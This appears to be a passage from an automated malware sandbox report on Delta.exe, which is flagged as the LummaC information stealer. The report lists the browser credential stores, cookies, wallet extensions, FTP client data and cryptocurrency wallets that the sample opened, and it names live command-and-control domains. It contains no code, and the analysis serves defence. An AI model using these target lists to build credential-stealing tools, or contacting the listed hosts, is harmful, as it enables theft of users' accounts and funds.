Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\Delta.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX	Jump to behavior

Source: Yara match

File source: Process Memory Space: Delta.exe PID: 7396, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: Delta.exe PID: 7396, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	211 Process Injection	22 Virtualization/Sandbox Evasion	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 DLL Side-Loading	211 Process Injection	LSASS Memory	1 Query Registry	Remote Desktop Protocol	41 Data from Local System	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	Logon Script (Windows)	11 Deobfuscate/Decode Files or Information	Security Account Manager	241 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Obfuscated Files or Information	NTDS	22 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Software Packing	LSA Secrets	1 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	11 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	33 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Delta.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://fancywaxxers.shop/apig	100%	Avira URL Cloud	malware
https://fancywaxxers.shop/apiS	100%	Avira URL Cloud	malware
https://fancywaxxers.shop/w	100%	Avira URL Cloud	malware
https://fancywaxxers.shop/oft.coc	100%	Avira URL Cloud	malware
https://fancywaxxers.shop/ll	100%	Avira URL Cloud	malware
https://fancywaxxers.shop/api3	100%	Avira URL Cloud	malware
https://fancywaxxers.shop/5	100%	Avira URL Cloud	malware
https://fancywaxxers.shop/micros	100%	Avira URL Cloud	malware
https://fancywaxxers.shop/C	100%	Avira URL Cloud	malware
https://fancywaxxers.shop/k	100%	Avira URL Cloud	malware
https://fancywaxxers.shop:443/apiUserUserUser	100%	Avira URL Cloud	malware
https://fancywaxxers.shop/api:	100%	Avira URL Cloud	malware
http://www.microsoft.coc	0%	Avira URL Cloud	safe
https://fancywaxxers.shop/3	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
fancywaxxers.shop	104.21.96.1	true	false		high

Contacted URLs

Name	Malicious	Reputation
fancywaxxers.shop	false	high
rabidcowse.shop	false	high
wholersorie.shop	false	high
cloudewahsj.shop	false	high
noisycuttej.shop	false	high
nearycrepso.shop	false	high
https://fancywaxxers.shop/api	false	high
framekgirus.shop	false	high
tirepublicerj.shop	false	high
abruptyopsn.shop	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	Delta.exe, 00000002.00000003.1715767224.000000000546B000.00000004.00000800.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1715832987.0000000005469000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	Delta.exe, 00000002.00000003.1715767224.000000000546B000.00000004.00000800.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1715832987.0000000005469000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fancywaxxers.shop/apig	Delta.exe, 00000002.00000003.1715106339.0000000002C30000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
